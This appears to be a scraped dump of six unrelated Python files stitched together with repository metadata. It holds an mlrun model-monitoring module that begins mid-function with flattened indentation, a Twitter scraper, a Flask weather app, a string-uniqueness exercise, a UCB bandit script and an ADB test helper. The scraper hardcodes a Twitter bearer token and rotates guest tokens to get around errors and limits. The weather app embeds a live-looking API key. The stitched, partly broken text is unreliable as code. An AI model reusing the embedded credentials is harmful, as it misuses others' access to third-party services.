        # Set the project to the job function
        function.metadata.project = project
        if not mlrun.mlconf.is_ce_mode():
            function = self._apply_access_key_and_mount_function(
                project=project,
                function=function,
                model_monitoring_access_key=model_monitoring_access_key,
                auth_info=auth_info,
                function_name=function_name,
            )
        # Enrich runtime with the required configurations
        server.api.api.utils.apply_enrichment_and_validation_on_function(
            function, auth_info
        )
        return function
    @classmethod
    def _submit_schedule_batch_job(
        cls,
        project: str,
        function_uri: str,
        db_session: sqlalchemy.orm.Session,
        auth_info: mlrun.common.schemas.AuthInfo,
        tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
        tracking_offset: Seconds = Seconds(0),
        function_name: str = "model-monitoring-batch",
    ):
        """
        Create a new scheduled monitoring batch job analysis based on the model-monitoring-batch function that has
        been already registered.

        :param project:         Project name.
        :param function_uri:    Function URI of the registered model monitoring batch job. This URI includes the
                                related project name, function name, and hash key.
        :param db_session:      A session that manages the current dialog with the database.
        :param auth_info:       The auth info of the request.
        :param tracking_policy: Model monitoring configurations.
        :param tracking_offset: Offset for the tracking policy (for synchronization with the stream).
        :param function_name:   Name used for both the task and the schedule entry
                                (model-monitoring-batch or the controller name).
        """
        function_uri = function_uri.replace("db://", "")
        task = mlrun.new_task(name=function_name, project=project)
        task.spec.function = function_uri
        # Schedule cron string and the batch-interval parameters derived from it.
        schedule, batch_dict = cls._generate_schedule_and_interval_dict(
            function_name=function_name,
            tracking_policy=tracking_policy,
            tracking_offset=tracking_offset,
        )
        task.spec.parameters[
            mlrun.common.schemas.model_monitoring.EventFieldType.BATCH_INTERVALS_DICT
        ] = batch_dict
        data = {
            "task": task.to_dict(),
            "schedule": schedule,
        }
        logger.info(
            f"Deploying {function_name.replace('-',' ')} processing function",
            project=project,
        )
        # Add job schedule policy (every hour by default)
        server.api.api.utils.submit_run_sync(
            db_session=db_session, auth_info=auth_info, data=data
        )
@classmethod
def _generate_schedule_and_interval_dict(
cls,
function_name: str,
tracking_policy: mlrun.model_monitoring.tracking_policy.TrackingPolicy,
tracking_offset: Seconds,
) -> typing.Tuple[str, typing.Dict[str, int]]:
"""Generate schedule cron string along with the batch interval dictionary according to the providing
function name. As for the model monitoring controller function, the dictionary batch interval is
corresponding to the scheduling policy.
:param tracking_policy: Model monitoring configurations.
:param tracking_offset: Offset for the tracking policy (for synchronization with the stream).
:return: A tuple of:
[0] = Schedule cron string
[1] = Dictionary of the batch interval.
"""
if function_name == mm_constants.MonitoringFunctionNames.BATCH:
# Apply batching interval params
interval_list = [
tracking_policy.default_batch_intervals.minute,
tracking_policy.default_batch_intervals.hour,
tracking_policy.default_batch_intervals.day,
]
(
minutes,
hours,
days,
) = server.api.crud.model_monitoring.helpers.get_batching_interval_param(
interval_list
)
schedule = server.api.crud.model_monitoring.helpers.convert_to_cron_string(
tracking_policy.default_batch_intervals,
minute_delay=seconds2minutes(tracking_offset),
)
else:
# Apply monitoring controller params
minutes = tracking_policy.base_period
hours = days = 0
schedule = f"*/{tracking_policy.base_period} * * * *"
batch_dict = {
mm_constants.EventFieldType.MINUTES: minutes,
mm_constants.EventFieldType.HOURS: hours,
mm_constants.EventFieldType.DAYS: days,
}
return schedule, batch_dict
def _apply_stream_trigger(
self,
project: str,
function: mlrun.runtimes.ServingRuntime,
model_monitoring_access_key: str = None,
auth_info: mlrun.common.schemas.AuthInfo = Depends(deps.authenticate_request),
function_name: str = None,
) -> mlrun.runtimes.ServingRuntime:
"""Adding stream source for the nuclio serving function. By default, the function has HTTP stream trigger along
with another supported stream source that can be either Kafka or V3IO, depends on the stream path schema that is
defined under mlrun.mlconf.model_endpoint_monitoring.store_prefixes. Note that if no valid stream path has been
provided then the function will have a single HTTP stream source.
:param project: Project name.
:param function: The serving function object that will be applied with the stream trigger.
:param model_monitoring_access_key: Access key to apply the model monitoring stream function when the stream is
schema is V3IO.
:param auth_info: The auth info of the request.
:param function_name: the name of the function that be applied with the stream trigger,
None for model_monitoring_stream
:return: ServingRuntime object with stream trigger.
"""
# Get the stream path from the configuration
# stream_path = mlrun.mlconf.get_file_target_path(project=project, kind="stream", target="stream")
stream_path = server.api.crud.model_monitoring.get_stream_path(
project=project, application_name=function_name
)
if stream_path.startswith("kafka://"):
topic, brokers = mlrun.datastore.utils.parse_kafka_url(url=stream_path)
# Generate Kafka stream source
stream_source = mlrun.datastore.sources.KafkaSource(
brokers=brokers,
topics=[topic],
)
function = stream_source.add_nuclio_trigger(function)
if not mlrun.mlconf.is_ce_mode():
function = self._apply_access_key_and_mount_function(
project=project,
function=function,
model_monitoring_access_key=model_monitoring_access_key,
auth_info=auth_info,
function_name=function_name,
)
if stream_path.startswith("v3io://"):
# Generate V3IO stream trigger
function.add_v3io_stream_trigger(
stream_path=stream_path,
name="monitoring_stream_trigger"
if function_name is None
else f"monitoring_{function_name}_trigger",
access_key=model_monitoring_access_key
if function_name != mm_constants.MonitoringFunctionNames.STREAM
else None,
)
# Add the default HTTP source
http_source = mlrun.datastore.sources.HttpSource()
function = http_source.add_nuclio_trigger(function)
return function
@staticmethod
def _apply_access_key_and_mount_function(
project: str,
function: typing.Union[
mlrun.runtimes.KubejobRuntime, mlrun.runtimes.ServingRuntime
],
model_monitoring_access_key: str,
auth_info: mlrun.common.schemas.AuthInfo,
function_name: str = None,
) -> typing.Union[mlrun.runtimes.KubejobRuntime, mlrun.runtimes.ServingRuntime]:
"""Applying model monitoring access key on the provided function when using V3IO path. In addition, this method
mount the V3IO path for the provided function to configure the access to the system files.
:param project: Project name.
:param function: Model monitoring function object that will be filled with the access key and
the access to the system files.
:param model_monitoring_access_key: Access key to apply the model monitoring stream function when the stream is
schema is V3IO.
:param auth_info: The auth info of the request.
:return: function runtime object with access key and access to system files.
"""
if function_name in mm_constants.MonitoringFunctionNames.all():
# Set model monitoring access key for managing permissions
function.set_env_from_secret(
mlrun.common.schemas.model_monitoring.ProjectSecretKeys.ACCESS_KEY,
server.api.utils.singletons.k8s.get_k8s_helper().get_project_secret_name(
project
),
server.api.crud.secrets.Secrets().generate_client_project_secret_key(
server.api.crud.secrets.SecretsClientType.model_monitoring,
mlrun.common.schemas.model_monitoring.ProjectSecretKeys.ACCESS_KEY,
),
)
function.metadata.credentials.access_key = model_monitoring_access_key
function.apply(mlrun.v3io_cred())
# Ensure that the auth env vars are set
server.api.api.utils.ensure_function_has_auth_set(function, auth_info)
return function
def _initial_model_monitoring_writer_function(
self, project, model_monitoring_access_key, tracking_policy, auth_info
):
"""
Initialize model monitoring writer function.
:param project: Project name.
:param model_monitoring_access_key: Access key to apply the model monitoring process. Please note that in CE
deployments this parameter will be None.
:param tracking_policy: Model monitoring configurations.
:param auth_info: The auth info of the request.
:return: A function object from a mlrun runtime class
"""
# Create a new serving function for the streaming process
function = mlrun.code_to_function(
name=mm_constants.MonitoringFunctionNames.WRITER,
project=project,
filename=str(_MONITORING_WRITER_FUNCTION_PATH),
kind="serving",
image=tracking_policy.default_controller_image,
)
# Create writer monitoring serving graph
graph = function.set_topology("flow")
graph.to(ModelMonitoringWriter(project=project)).respond() # writer
# Set the project to the serving function
function.metadata.project = project
# create v3io stream for model_monitoring_writer | model monitoring application
server.api.api.endpoints.functions.create_model_monitoring_stream(
project=project,
function=function,
monitoring_application=mm_constants.MonitoringFunctionNames.WRITER,
stream_path=server.api.crud.model_monitoring.get_stream_path(
project=project,
application_name=mm_constants.MonitoringFunctionNames.WRITER,
),
access_key=model_monitoring_access_key,
)
# Add stream triggers
function = self._apply_stream_trigger(
project=project,
function=function,
model_monitoring_access_key=model_monitoring_access_key,
auth_info=auth_info,
function_name=mm_constants.MonitoringFunctionNames.WRITER,
)
# Apply feature store run configurations on the serving function
run_config = fstore.RunConfig(function=function, local=False)
function.spec.parameters = run_config.parameters
return function
def get_endpoint_features(
feature_names: typing.List[str],
feature_stats: dict = None,
current_stats: dict = None,
) -> typing.List[mlrun.common.schemas.Features]:
"""
Getting a new list of features that exist in feature_names along with their expected (feature_stats) and
actual (current_stats) stats. The expected stats were calculated during the creation of the model endpoint,
usually based on the data from the Model Artifact. The actual stats are based on the results from the latest
model monitoring batch job.
param feature_names: List of feature names.
param feature_stats: Dictionary of feature stats that were stored during the creation of the model endpoint
object.
param current_stats: Dictionary of the latest stats that were stored during the last run of the model monitoring
batch job.
return: List of feature objects. Each feature has a name, weight, expected values, and actual values. More info
can be found under `mlrun.common.schemas.Features`.
"""
# Initialize feature and current stats dictionaries
safe_feature_stats = feature_stats or {}
safe_current_stats = current_stats or {}
# Create feature object and add it to a general features list
features = []
for name in feature_names:
if feature_stats is not None and name not in feature_stats:
logger.warn("Feature missing from 'feature_stats'", name=name)
if current_stats is not None and name not in current_stats:
logger.warn("Feature missing from 'current_stats'", name=name)
f = mlrun.common.schemas.Features.new(
name, safe_feature_stats.get(name), safe_current_stats.get(name)
)
features.append(f)
return features
| mlrun/mlrun | server/api/crud/model_monitoring/deployment.py | deployment.py | py | 35,326 | python | en | code | 1,129 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "mlrun.common.schemas.model_monitoring.mlconf",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "mlrun.common.schemas.model_monitoring",
"line_number": 40,
"usage_type": "... |
29147272703 | # TODO
# urrlib <-> requests
import requests
from .http_helper import TwitterHttpHelper as HttpHelper
from urllib.parse import quote
from orderedset import OrderedSet
from lxml.html import document_fromstring
from lxml.etree import tostring, ParserError
import time
import re
class CircularOrderedSet(OrderedSet):
def __init__(self, size=0):
super(CircularOrderedSet, self).__init__()
self.size = size
def add(self, value):
super(CircularOrderedSet, self).add(value)
self._truncate()
def _truncate(self):
if len(self) > self.size:
self.pop(last=False)
class BlueBird:
API_WEB = 'web'
API_1_1 = '1_1'
API_2 = '2'
emoji_flag = '24f2c44c'
emoji_regex = re.compile(r'alt="(.{0,8})"')
img_regex = re.compile(r'<img([\w\W]+?)/>')
ACCESS_TOKEN = 'AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA'
def __init__(self):
self.guest_tokens = list()
self._request_guest_token()
self.user_ids = dict()
self.user_names = dict()
@staticmethod
def get_emojis(text):
return re.findall(BlueBird.emoji_regex, text)
@staticmethod
def get_tagged_html(text):
return re.sub(BlueBird.img_regex, f' {BlueBird.emoji_flag} ', text)
@staticmethod
def insert_emojis(emojis, text):
for emoji in emojis:
text = text.replace(f' {BlueBird.emoji_flag} ', emoji, 1)
text = text.replace(f' {BlueBird.emoji_flag} ', '')
return text
@staticmethod
def post_process_text(text):
text = text.replace('…', '')
text = re.sub(r'\s+', ' ', text)
return text
@staticmethod
def get_processed_text(html_content):
emojis = BlueBird.get_emojis(html_content)
tagged_html = BlueBird.get_tagged_html(html_content)
tagged_text = document_fromstring(tagged_html).text_content()
tagged_text_emojis = BlueBird.insert_emojis(emojis, tagged_text)
text = BlueBird.post_process_text(tagged_text_emojis)
return text.strip()
@staticmethod
def _get_auth_header(guest_token=None):
headers = {'authorization': f'Bearer {BlueBird.ACCESS_TOKEN}'}
if guest_token is not None:
headers['x-guest-token'] = guest_token
return headers
@staticmethod
def _get_guest_token():
url = 'https://api.twitter.com/1.1/guest/activate.json'
headers = BlueBird._get_auth_header()
response = requests.post(url, headers=headers)
return response.json()['guest_token']
def _get_first_guest_token(self):
return self.guest_tokens[0]
def _rotate_guest_token(self):
self.guest_tokens.append(self._pop_guest_token())
def _pop_guest_token(self):
return self.guest_tokens.pop(0)
def _request_guest_token(self):
guest_token = self._get_guest_token()
self.guest_tokens.append(guest_token)
def _get_api_response(self, url):
first_guest_token = None
valid_guest_token_found = False
data = None
while not valid_guest_token_found:
guest_token = self._get_first_guest_token()
if first_guest_token is None:
first_guest_token = guest_token
elif first_guest_token == guest_token:
self._request_guest_token()
headers = self._get_auth_header(guest_token=guest_token)
response = requests.get(url, headers=headers)
data = response.json()
if 'errors' in data:
error_message = data['errors'][0]['message']
if error_message == 'Forbidden.':
self._pop_guest_token()
elif error_message == 'Bad request.' or error_message == "User not found.":
return
else:
self._rotate_guest_token()
else:
valid_guest_token_found = True
return data
def get_user_by_name(self, username):
url = f'https://api.twitter.com/1.1/users/show.json?screen_name={username}'
return self._get_api_response(url)
def get_user_by_id(self, user_id):
url = f'https://api.twitter.com/1.1/users/show.json?id={user_id}'
return self._get_api_response(url)
def get_user_id(self, username):
if username not in self.user_ids:
user_id = self.get_user_by_name(username)['id']
self.user_ids[username] = user_id
return self.user_ids[username]
def get_screen_name(self, user_id):
if user_id not in self.user_names:
screen_name = self.get_user_by_id(user_id)['screen_name']
self.user_names[user_id] = screen_name
return self.user_names[user_id]
@staticmethod
def _update_url_with_params(url, params):
first = True
for key, value in params.items():
symbol = '&'
if first:
symbol = '?'
first = False
url += f'{symbol}{key}={value}'
return url
@staticmethod
def _encode_query(query) -> str:
encoded_query = ''
since = None
if 'since' in query:
since = query['since']
until = None
if 'until' in query:
until = query['until']
near = None
if 'near' in query:
near = query['near']
lang = None
if 'lang' in query:
lang = query['lang']
fields = []
if 'fields' in query:
fields = query['fields']
for field in fields:
target = None
if 'target' in field:
target = field['target']
items = field['items']
match = None
if 'match' in field:
match = field['match']
exact = False
if 'exact' in field:
exact = field['exact']
if exact:
marginal_query = '"' + '" "'.join(items) + '"'
else:
target = None
if 'target' in field:
target = field['target']
if target == 'from':
marginal_query = 'from:' + ' from:'.join(items)
elif target == 'to':
marginal_query = 'to:' + ' to:'.join(items)
elif target == 'hashtag':
marginal_query = '#' + ' #'.join(items)
elif target == 'mention':
marginal_query = '@' + ' @'.join(items)
else:
marginal_query = ' '.join(items)
if match == 'any':
marginal_query = ' OR '.join(marginal_query.split())
elif match == 'none':
marginal_query = '-' + ' -'.join(marginal_query.split())
if match == 'any':
encoded_query += ' (' + marginal_query + ')'
else:
encoded_query += ' ' + marginal_query
if since is not None:
encoded_query += f' since:{since}'
if until is not None:
encoded_query += f' until:{until}'
if near is not None:
encoded_query += f' near:"{near[0]}" within:{near[1]}mi'
encoded_query = encoded_query.strip()
encoded_query = quote(encoded_query)
if lang is not None:
encoded_query += f'&l={lang}'
print(f'[Test URL] https://twitter.com/search?f=tweets&vertical=default&q={encoded_query}')
return encoded_query
def _get_tweets_web(self, url, deep, sleep_time, query_type, min_tweets):
seen_tweets = 0
if query_type == 'user':
position = ''
elif query_type == 'search':
position = '&max_position=-1'
# Generalizar con params como los otros
if not '?' in url:
url += '?'
else:
url += '&'
url += 'include_available_features=1&include_entities=1'
has_more_items = True
while has_more_items:
new_url = f'{url}{position}&reset_error_state=false'
done = False
while not done:
try:
content = HttpHelper.get_json_response(new_url)
done = True
except Exception:
continue
items_html = content['items_html']
try:
root = document_fromstring(items_html)
except ParserError:
continue
has_more_items = content['has_more_items']
if not deep:
has_more_items = False
if 'min_position' in content:
position = f"&max_position={content['min_position']}"
else:
continue
tweets_data = root.xpath("//div[@data-tweet-id]")
tweets_content = root.xpath("//p[@lang]")
tweets_timestamps = root.xpath("//span[@data-time-ms]")
for i, tweet_data in enumerate(tweets_data):
seen_tweets += 1
body_html = tostring(tweets_content[i], encoding='unicode')
body = BlueBird.get_processed_text(body_html)
tweet_id = tweet_data.attrib['data-tweet-id']
timestamp = tweets_timestamps[i].attrib['data-time-ms']
language = tweets_content[i].attrib['lang']
name = tweet_data.attrib['data-name']
screen_name = tweet_data.attrib['data-screen-name']
author_id = tweet_data.attrib['data-user-id']
tweet = {
'user': {
'name': name,
'screen_name': screen_name,
'id': author_id
},
'id': tweet_id,
'language': language,
'timestamp': timestamp,
'text': body,
'url': f'https://twitter.com/{screen_name}/status/{tweet_id}',
}
yield tweet
# Restart if the min_tweets target wasn't achieved
if not has_more_items and seen_tweets < min_tweets:
seen_tweets = 0
has_more_items = True
if query_type == 'user':
position = ''
elif query_type == 'search':
position = '&max_position=-1'
continue
if deep:
time.sleep(sleep_time)
def _search_web(self, query, deep, count, sleep_time, min_tweets):
encoded_query = BlueBird._encode_query(query)
base_url = f'https://twitter.com/i/search/timeline?f=tweets&vertical=news&q={encoded_query}&src=typd'
yield from self._get_tweets_web(base_url, deep, sleep_time, 'search', min_tweets)
def _user_timeline_web(self, username, deep, count, include_replies, sleep_time, min_tweets):
base_url = f'https://twitter.com/i/profiles/show/{username}/timeline/tweets'
yield from self._get_tweets_web(base_url, deep, sleep_time, 'user', min_tweets)
def _get_tweets_2(self, url, deep, sleep_time, min_tweets):
seen_tweets = 0
cursor = None
done = False
while not done:
new_url = url
if cursor is not None:
new_url += f'&cursor={cursor}'
response = self._get_api_response(new_url)
if response is None:
break
tweets = response['globalObjects']['tweets']
done = True
for tweet_id, tweet in tweets.items():
seen_tweets += 1
tweet['id'] = tweet_id
done = False
yield tweet
try:
cursor = response['timeline']['instructions'][0]['addEntries']\
['entries'][-1]['content']['operation']['cursor']['value']
except (KeyError, IndexError):
try:
cursor = response['timeline']['instructions'][-1]['replaceEntry']\
['entry']['content']['operation']['cursor']['value']
except KeyError:
done = True
# Restart if the min_tweets target wasn't achieved
if not done and seen_tweets < min_tweets:
seen_tweets = 0
cursor = None
done = False
continue
def _search_2(self, query, deep, count, sleep_time, min_tweets):
if count > 200:
count = 200
encoded_query = BlueBird._encode_query(query)
base_url = 'https://api.twitter.com/2/search/adaptive.json'
params = {
'q': encoded_query,
'count': count,
'sorted_by_time': 'true',
'tweet_mode': 'extended'
}
url = BlueBird._update_url_with_params(base_url, params)
print(url)
yield from self._get_tweets_2(url, deep, sleep_time, min_tweets)
def _user_timeline_2(self, username, deep, count, include_replies, sleep_time, min_tweets):
user_id = self.get_user_id(username)
if count > 200:
count = 200
if include_replies:
include_tweet_replies = 'true'
else:
include_tweet_replies = 'false'
url = f'https://api.twitter.com/2/timeline/profile/{user_id}.json'
params = {
'count': count,
'include_entities': 'false',
'tweet_mode': 'extended',
'include_reply_count': 0,
'include_user_entities': 'false',
'send_error_codes': 'false',
'include_tweet_replies': include_tweet_replies
}
url = BlueBird._update_url_with_params(url, params)
yield from self._get_tweets_2(url, deep, sleep_time, min_tweets)
def _get_tweets_1_1(self, url, deep, sleep_time, min_tweets):
seen_tweets = 0
max_id = None
done = False
while not done:
new_url = url
if max_id is not None:
new_url += f'&max_id={max_id}'
tweets = None
attempts = 10
retry = True
while attempts and retry and not done:
attempts -= 1
response = self._get_api_response(new_url)
# Search
if 'statuses' in response:
tweets = response['statuses']
else:
tweets = response
retry = True
for tweet in tweets:
retry = False
seen_tweets += 1
if max_id == tweet['id']:
done = True
else:
max_id = tweet['id']
yield tweet
if not tweets:
done = True
# Restart if the min_tweets target wasn't achieved
if done and seen_tweets < min_tweets:
done = False
continue
if not deep:
done = True
else:
time.sleep(sleep_time)
def _search_1_1(self, query, deep, count, sleep_time, min_tweets):
if count > 100:
count = 100
encoded_query = BlueBird._encode_query(query)
base_url = 'https://api.twitter.com/1.1/search/tweets.json'
params = {
'q': encoded_query,
'count': count,
'result_type': 'recent',
'include_entities': 'false'
}
url = BlueBird._update_url_with_params(base_url, params)
yield from self._get_tweets_1_1(url, deep, sleep_time, min_tweets)
def _user_timeline_1_1(self, username, deep, count, include_replies, sleep_time, min_tweets):
if count > 200:
count = 200
if include_replies:
exclude_tweet_replies = 'false'
else:
exclude_tweet_replies = 'true'
base_url = f'https://api.twitter.com/1.1/statuses/user_timeline.json'
params = {
'screen_name': username,
'trim_user': 'true',
'exclude_replies': exclude_tweet_replies,
'count': count
}
url = BlueBird._update_url_with_params(base_url, params)
yield from self._get_tweets_1_1(url, deep, sleep_time, min_tweets)
def search(self, query, deep=False, count=100, sleep_time=0, min_tweets=0, mode=API_2):
return getattr(self, f'_search_{mode}')(query, deep, count, sleep_time, min_tweets)
def user_timeline(self,
username,
deep=False,
count=200,
include_replies=True,
sleep_time=0,
min_tweets=0,
mode=API_2):
return getattr(self, f'_user_timeline_{mode}')(username, deep, count, include_replies,
sleep_time, min_tweets)
def stream(self, query, sleep_time=0, mode=API_2):
known_tweets = CircularOrderedSet(50)
while True:
try:
for tweet in self.search(query, mode=mode):
if tweet['id'] not in known_tweets:
known_tweets.add(tweet['id'])
yield tweet
except Exception:
pass
time.sleep(sleep_time)
@staticmethod
def get_list_members(username, list_name):
has_more_items = True
min_position = -1
while has_more_items:
url = f'https://twitter.com/{username}/lists/{list_name}/members/timeline?include_available_features=1&include_entities=1&max_position={min_position}&reset_error_state=false'
content = HttpHelper.get_json_response(url)
items_html = content['items_html']
try:
root = document_fromstring(items_html)
except ParserError:
continue
has_more_items = content['has_more_items']
min_position = content['min_position']
account_elements = root.xpath(
"//div[contains(@class, 'account') and @data-screen-name]")
for account in account_elements:
name = account.attrib['data-name']
screen_name = account.attrib['data-screen-name']
author_id = account.attrib['data-user-id']
yield {'name': name, 'screen_name': screen_name, 'id': author_id}
@staticmethod
def get_followings(username):
return BlueBird.get_followx(username, target='followings')
@staticmethod
def get_followers(username):
return BlueBird.get_followx(username, target='followers')
@staticmethod
def get_followx(username, target):
has_more_items = True
min_position = 0
while has_more_items:
url = f'https://mobile.twitter.com/{username}/{target}?lang=en'
if min_position:
url += f'&cursor={min_position}'
content = HttpHelper.get_html_response(url)
try:
root = document_fromstring(bytes(content, encoding='utf-8'))
except ParserError:
continue
account_elements = root.xpath("//td[contains(@class, 'screenname')]/a[@name]")
for account in account_elements:
screen_name = account.attrib['name']
yield screen_name
try:
min_position = root.xpath(
"//div[@class='w-button-more']/a")[0].attrib['href'].split('cursor=')[1]
except IndexError:
has_more_items = False
@staticmethod
def get_hashtags(place):
raise NotImplementedError
@staticmethod
def get_profile(username):
# TODO url = f'https://mobile.twitter.com/{username}'
raise NotImplementedError
@staticmethod
def get_likes_no(tweet):
raise NotImplementedError
@staticmethod
def get_retweets_no(tweet):
raise NotImplementedError
@staticmethod
def get_replies_no(tweet):
raise NotImplementedError
| labteral/bluebird | bluebird/scraper.py | scraper.py | py | 20,410 | python | en | code | 45 | github-code | 36 | [
{
"api_name": "orderedset.OrderedSet",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "re.compile",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_nu... |
26765982477 | import requests
from flask import Flask, render_template, request, redirect, url_for, flash
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///weather.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'qwertyuiopsecretkey'
db = SQLAlchemy(app)
class City(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
# app.config['DEBUG'] = True
key = 'c9f1f34212b6ce232a81ca55ffc01e4f'
unit = 'metric'
url = 'http://api.openweathermap.org/data/2.5/weather?q={}&units={}&appid={}'
def get_weather_data(city):
r = requests.get(url.format(city, unit, key)).json()
return r
@app.route('/')
def index_get():
cities = City.query.all()
weather_data = []
for city in cities:
r = get_weather_data(city.name)
# print(r)
#
weather = {
'city': city.name,
'temperature': round(r['main']['temp']),
'description': str(r['weather'][0]['description']).title(),
'icon': r['weather'][0]['icon'],
'humidity':r['main']['humidity'],
'wind': r['wind']['speed']
}
weather_data.append(weather)
return render_template('index.html', weather_data=weather_data)
@app.route('/', methods=['POST'])
def index_post():
err_msg = ''
new_city = request.form.get('city').strip().lower()
res = get_weather_data(new_city)
if res['cod'] == 200 and new_city:
city_exists = City.query.filter(City.name.ilike(f"%{new_city}%")).first()
if not city_exists:
city_to_add = City(name=new_city.title())
db.session.add(city_to_add)
db.session.commit()
else:
err_msg = 'City Already Exists'
else:
err_msg = 'City does not exist in the world !'
if err_msg:
flash(err_msg, 'error')
else:
flash('City Added Successfully !', 'success')
return redirect(url_for('index_get'))
@app.route('/delete/<name>')
def delete_city(name):
city = City.query.filter_by(name=name).first()
db.session.delete(city)
db.session.commit()
flash('Successfully Deleted {}'.format(city.name),'success')
return redirect(url_for('index_get'))
if __name__ == "__main__":
app.run(debug=True)
| thenileshunde/weatherly | app.py | app.py | py | 2,509 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "flask.render_temp... |
34848563515 | """1.1 Implement an algorithm to determine if a string has all unique
characters. What if you cannot use additional data structures?"""
def is_unique(input_string):
"""determines if a string has all unique characters"""
from collections import Counter
counter = Counter(input_string)
for char, values in counter.items():
if values > 1:
return False
return True
def test_is_unique():
assert is_unique("asdfg") == True
assert is_unique("asssdffasdf") == False
def is_unique_without_counter(input_string):
"""Check if a string has all unique characters *without* using additional
data structures"""
input_string = sorted(input_string)
last_char = None
for char in input_string:
if char == last_char:
return False
last_char = char
return True
def test_is_unique_without_counter():
assert is_unique_without_counter("asdfg") == True
assert is_unique_without_counter("asssdffasdf") == False
| stonecharioteer/blog | source/code/books/ctci/01_arrays_and_strings/ex_1x1_unique.py | ex_1x1_unique.py | py | 1,001 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "collections.Counter",
"line_number": 9,
"usage_type": "call"
}
] |
6762090600 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
# Importing the dataset
dataset = pd.read_csv('Ads_CTR_Optimisation.csv')
#Implementing the UCB(from scratch.!!)
#we need to consider this number for each ad i. We're going to create a vector that will contain each of those members of selections of each ad i. So we will set this variable to vector of size d and we will initialize all components of this vector to zero.
d=10
numbers_of_selections=[0]*d
#This will create a vector of size d with zeros in it and we are doing this because of course at first round each version of the ad isn't being selected at,so no of times each version of the ad gets selected is of cousre 0
N=10000
ads_selected=[]
#sum of rewards of ad i upto round n, so we are going to set it as vector of decomponentsN=10000
sums_of_rewards=[0]*d
total_reward=0
for n in range(0, N):
ad = 0
max_upper_bound = 0
for i in range(0, d):
if (numbers_of_selections[i] > 0):
average_reward = sums_of_rewards[i] / numbers_of_selections[i]
delta_i = math.sqrt(3/2 * math.log(n + 1) / numbers_of_selections[i])
upper_bound = average_reward + delta_i
else:
upper_bound = 1e400
if upper_bound > max_upper_bound:
max_upper_bound = upper_bound
ad = i
ads_selected.append(ad)
numbers_of_selections[ad] = numbers_of_selections[ad] + 1
reward = dataset.values[n, ad]
sums_of_rewards[ad] = sums_of_rewards[ad] + reward
total_reward = total_reward + reward
#Visualising The Results
plt.hist(ads_selected)
plt.title('Hostogram: ADS Selections')
plt.xlabel("Ads")
plt.ylabel('No of Times Each add was selected')
plt.show()
| raja17021998/Exciting-Machine-Learning-Journey-on-Python-and-R | Part 6 - Reinforcement Learning/Section 32 - Upper Confidence Bound (UCB)/UCB/upper_confidence_bound_wd.py | upper_confidence_bound_wd.py | py | 1,845 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "math.log",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.hist",
"line_... |
5487070944 | # from ADBInterface import
from Common import CommonFunction, AssertResult, ADBCommand, DealAlert
from Common.Log import MyLog, OutPutText
import re
from Conf.Config import Config
from ADBInterface import simplify_interface_code
from ADBInterface.Qualcomm import QualcommChip
import time
import datetime
meta_alert = DealAlert.AlertData()
log = MyLog()
my_text = OutPutText()
sim_code = simplify_interface_code.simplify_code()
assertData = AssertResult.AssertOutput()
commData = CommonFunction.CommonData()
adbData = ADBCommand.ADBManage()
class QualcommAndroid11(QualcommChip.QualcommChipInterface):
    """ADB-driven test helpers for Qualcomm devices running Android 11.

    Wraps the shared Common/ADBInterface singletons (``commData``,
    ``sim_code``, ``assertData``, ``my_text``, ``log``, ``meta_alert``)
    to reboot the device, obtain root/remount access, and exercise
    volume, brightness, and screen-timeout settings over ``adb shell``.

    NOTE(review): several methods call helpers not defined here
    (``cur_brightness``, ``deal_brigthness_time_out``, ``set_screen_sleep``,
    ``screen_sleep``, ``screen_wake``, ``unlock_screen``,
    ``get_screen_status``) -- presumably inherited from
    ``QualcommChipInterface``; confirm against that base class.
    """
    def __init__(self):
        # No per-instance state; all collaborators are module-level singletons.
        pass
    def reboot_dev(self):
        """Restart the adb server, re-acquire root/remount, then reboot the device."""
        commData.adb_restart_devices()
        self.open_root_auth()
        commData.adb_reboot()
    def reboot_dev_only(self):
        """Restart the adb server without rebooting the device."""
        commData.adb_restart_devices()
    def open_root_auth(self):
        """Enable ``adb root`` and ``adb remount``; assert both succeed."""
        act = commData.adb_root()
        ret = assertData.assert_is_true(act)
        act = commData.adb_remout()
        ret = assertData.assert_is_true(act)
        # commData.adb_reboot()
        # keep the reboot disabled while debugging
        # self.reboot_dev_only()
    def get_volume_offset(self):
        """Log the expected [min, max] volume ranges for each audio stream."""
        my_text.write_text("alarm_speaker: [1, 7]")
        my_text.write_text("music_speaker: [0, 15]")
        my_text.write_text("ring_speaker: [0, 15]")
        my_text.write_text("volume_voice_earpiece: [1, 5]")
    def get_volume_info(self, stream):
        """Read the system volume setting for *stream* and log/record it."""
        cmd = "settings get system %s" % str(stream)
        res = commData.send_shell_cmd(cmd)
        meg = "当前的音量信息为: %s" % res
        sim_code.print_log(meg)
        my_text.write_text(meg)
    # (kept for reference) earlier volume get/set/check helpers:
    # def get_cur_volume_value(self, stream):
    #     cmd = "settings get system %s" % str(stream)
    #     return sim_code.str_replace(commData.send_shell_cmd(cmd))
    #
